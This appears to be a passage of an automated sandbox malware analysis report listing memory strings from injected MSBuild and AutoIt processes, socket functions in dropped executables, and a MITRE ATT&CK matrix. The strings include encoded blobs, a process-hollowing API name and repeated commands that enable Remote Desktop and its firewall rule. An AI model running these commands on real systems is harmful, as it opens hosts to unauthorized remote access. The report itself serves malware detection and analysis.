set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: MSBuild.exe	String found in binary or memory: net start termservice
Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000002.2499423017.00000000043F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000002.2499423017.00000000043F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000003.2497625413.00000000048DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000003.2497625413.00000000048DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_007523E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	35_2_007523E0
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00751DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	35_2_00751DD8
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CF23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	38_2_00CF23E0
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CF1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	38_2_00CF1DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0043C0FA Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	41_2_0043C0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0043B403 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	41_2_0043B403

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	57 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	112 Process Injection	1 Masquerading	LSA Secrets	41 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
